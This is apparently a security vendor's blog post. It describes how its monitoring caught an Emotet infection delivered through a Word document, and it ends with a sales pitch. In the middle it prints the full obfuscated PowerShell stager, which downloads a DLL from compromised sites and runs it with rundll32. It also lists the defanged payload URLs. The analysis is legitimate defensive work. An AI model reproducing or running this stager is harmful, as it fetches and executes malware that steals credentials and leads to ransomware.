The malware known as Emotet is back in action. Now, it’s more malicious than ever.

It’s estimated that 7% of global organizations have been subject to Emotet.

One of CYDEF’s managed detection and response clients was one of them. Fortunately, our team of analysts detected unusual activity associated with the attack before damage was done.

The following post details how the malware was detected and discusses what would have happened if we didn’t catch the attack as early as we did.

Emotet Slips by Standard Defenses

Not so long ago, our client received an email from a trusted business partner.

The partner sent an unexpected document, but this wasn’t out of the ordinary. They often exchanged documents for review. However, this document wouldn’t open. So, the client attempted to download the document a second time.

As you might have guessed, the document wasn’t all on the up and up. Unfortunately, it slipped through the spam filter, the AV layer, and other preventive defenses.

CYDEF Detects Emotet

During the course of routine monitoring, the team at CYDEF detected activity linked with the cmd.exe program:

emotet cmd line

This was an obvious attempt at obfuscation.

Upon identifying the breach, CYDEF immediately notified the client that they’d been hit by a living-off-the-land malware attack. We recommended that they quarantine the machine immediately.

About 60-minutes after the email had first been opened, the affected computer was removed from the network, unplugged, and secured in a private location.

Deobfuscating the Attack

During the deep dive to understand the scope of the incident, CYDEF analysts discovered a malicious Word document that triggered the attack.

By pulling out the raw events from our endpoint detection tool’s stack view and event explorer, the team identified in the chain of parent processes:

  • An email file path from an Outlook contents folder
  • Outlook.exe was the parent process

We also identified a child process of the PowerShell command that resulted from the CMD.exe activity:

emotet child process

The DLL drop appeared to be the sole method of persistence and the main tool for attackers to unleash mayhem.

Unpacking Emotet

In order to contain the threat, we needed to understand the capabilities packed in the DLL.

Since the affected machine was unplugged, it would be hard to analyze the exact strain of malware present.

Instead, CYDEF’s analysts pulled indicators of compromises (IoCs) from our endpoint detection solution (SMART-Monitor), and decoded the Base 64-encoded PowerShell command (shown in the screen capture as all lowercase).

seT-iTEm (‘vaRiable:2’+’kh’+’5i’) ( [tYpE](“{3}{4}{2}{1}{0}{5}” -f’.di’,’O’,’I’,’SYStEM‘,’.’,’rEcTorY‘) ) ; $wXuSr=[tYpe](“{0}{2}{3}{7}{4}{1}{5}{6}” -F’SySt‘,’o’,’Em.’,’neT.Ser’,’CeP‘,’InTmanaG‘,’ER’,’VI’) ; $Kvd6whw=$D64M + [char](33) + $U46H;$J64U=(‘U_’+’0N’); $2kh5I::”Cr`Eate`dirE`Ct`ORY“($HOME + ((‘{0}Et3q’+(‘t1’+’j’)+'{0}’+’E’+(‘qy4’+’t’)+’xq{0}’) -f [cHar]92));$B69P=(‘G’+(’11’+’G’)); ( GCi (‘VaR‘+’iABLE:wX‘+’usR‘) ).vAluE::”SecU`Ri`TYPRotO`c`oL” = (‘T’+(‘ls’+’12’));$S92J=((‘C0’+’2′)+’H’);$Zthye68 = ((‘F3’+’2′)+’O’);$U15Z=((‘W’+’82’)+’V’);$Lzh4cpx=$HOME+((‘{0}E’+’t3’+’qt’+’1’+’j{0}Eqy4’+’txq{‘+’0’+’}’) -f [CHar]92)+$Zthye68+’.d’ + ‘ll’;$R99D=((‘U4’+’4′)+’R’);$Hvvhr9p=’h’ + ‘tt‘ + ‘p’;$U5tym2l=((‘sg’+’ ‘)+’yw‘+’ a’+(‘h:’+’/’)+(‘/c’+’ov‘)+(‘is’+’ion‘)+’o’+’n’+’e’+’ne‘+(‘ss.or’+’g‘+’/ne’)+(‘w/F9’+’v/’+’!sg’)+(‘ y’+’w‘)+(‘ ah’+’s‘)+(‘:’+’//ww‘+’w.’)+’os‘+(‘h’+’isc‘+’af‘)+(‘e’+’.c‘)+’o’+’m‘+(‘/wp-a’+’dmin‘)+(‘/5’+’Dm’)+(‘/’+’!sg’)+’ y’+’w ‘+(‘a’+’hs:’+’//’)+’l’+(‘i‘+’onr‘)+(‘o’+’ckb‘+’atter’+’ie‘+’s.co’)+(‘m/’+’w’)+(‘p-s’+’n‘)+(‘a’+’ps‘)+(‘hots/’+’C’+’/’)+’!’+(‘sg’+’ yw ahs’)+(‘://’+’ww‘)+’w’+’.s‘+(‘chmu‘+’ckf‘)+(‘e’+’der‘)+(‘.’+’n’+’e’+’t/refer’)+’e’+(‘nce‘+’/ubpV/’+’!s’)+(‘g yw a’+’h:’+’//’)+(‘c’+’i‘+’rte‘+’klink‘)+(‘.’+’com/’+’F0’)+(‘xAutoC‘+’on’+’fi’+’g/’)+’1Z’+(‘b4/!s’+’g yw a’+’hs:’+’/’+’/’+’nim‘)+’bl’+’ed’+’es‘+(‘ign‘+’.’)+(‘m’+’ia‘)+(‘m’+’i/wp’)+(‘-ad’+’mi’+’n‘)+’/’+’C’+(‘/!sg yw ‘+’ah’+’://’+’xu’+’nh‘)+’o’+’ng‘+(‘.n’+’et‘+’/sys-cac‘)+’h’+’e‘+(‘/D’+’0′)+’/’).”RepL`A`CE“((‘s’+’g‘+(‘ yw‘+’ a’+’h‘)),([array](‘nj‘,’tr’),’yj’,’sc’,$Hvvhr9p,’wd’)[3]).”sP`LiT“($P4_B + $Kvd6whw + $X97D);$V43G=(‘F7’+’1J’);foreach ($Ob6xcz_ in $U5tym2l){try{(.(‘Ne’+’w-Obj’+’ec‘+’t’) SyStem.neT.WEbcLieNT).”DO`W`NlOADf`ILe“($Ob6xcz_, $Lzh4cpx);$A84S=(‘I’+(’21’+’K’));If ((.(‘Get-I’+’te‘+’m’) $Lzh4cpx).”lE`NGth” –ge 41708) {&(‘ru’+’ndl’+’l32’) $Lzh4cpx,((‘A’+’nyS‘)+’t’+(‘rin‘+’g’)).”to`stri`NG“();$Z64T=(‘B’+(’57’+’Z’));break;$C_5V=((‘N6’+’7′)+’Q’)}}catch{}}$G__F=((‘B3’+’_’)+’B’) 

While still obfuscated, the PowerShell was clearly building and looping through URLs in order to download something.

Then, the team identified the broken up rundll32 near the end.

In order to understand the source of the file, we needed to unscramble the middle portion of the command.

While there are multiple approaches to deobfuscating PowerShell code, we let the computer to do the work. This method is faster than manual intervention, and less error prone. In order to complete this step, we opened PowerShell in a (Linux) VM, and ran the code between $Hvvhr9p=’h’ + ‘tt’ + ‘p’; and foreach ($Ob6xcz_ in $U5tym2l).

Next, we requested the value of the $U5tym2l variable to view the URLs from which the stager was downloading the DLL:

http:  //covisiononeness[.]org/new/F9v/

https:  //www[.]oshiscafe[.]com/wp-admin/5Dm/

https:  //lionrockbatteries[.]com/wp-snapshots/C/

https:  //www[.]schmuckfeder[.]net/reference/ubpV/

http:  //cirteklink[.]com/F0xAutoConfig/1Zb4/

https:  //nimbledesign[.]miami/wp-admin/C/

http:  //xunhong[.]net/sys-cache/D0/         

 

The team accessed threat intelligence databases in an effort to identify the URLs, but we ultimately relied on access to the DLL from one of the URLs. By uploading the DLL to VirusTotal, we identified the attack as an Emotet infection.

https://www.virustotal.com/gui/file/01e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98/detection

About Emotet

Emotet is one of the most dangerous malware infections in circulation.

It started out as a method to steal banking credentials, then evolved into a remote access tool that ransomware operators use to manage infections. Emotet can steal the passwords needed to compromise more machines, perform lateral movements, and drop additional pieces of malware at a later date.

Emotet is responsible for Ryuk/Coni infections.

If you let an Emotet infection fester, it hijacks passwords for future use, compromises all the machines in your network, then drops a Ryuk ransomware payload.

Exploring Scenarios

What would have happened if the malware wasn’t caught in time?

If the breach had not been detected, the following fallout could be expected:

  • Passwords saved on the computer would be compromised
  • Attackers would gain access to business partner sites and payroll sites
  • Machines or networks would be hijacked
  • Ransom would be demanded

The average ransomware payment for this type of attack is over $1million.

Ransomware payents

Given our client was not as large as the average company paying the ransom in the Coverware report, the estimated demand would be around $100,000.

SMART-Monitor: CYDEF’s Managed Detection and Response Solution

The process of calculating the real value of cybersecurity is complicated. After all, a lot of cybersecurity spending is similar to insurance spending: you pay a premium month-after-month with no apparent benefit. Then, one day, something happens and you are very glad that you made the investment.

$100,000 in ransomware is not comparable – not even remotely – to the annual cost of an endpoint protection solution.  In this particular instance, our client certainly found value in the annual fee.

If you’re curious how CYDEF can support your business success, we offer a 30-day free proof-of-value.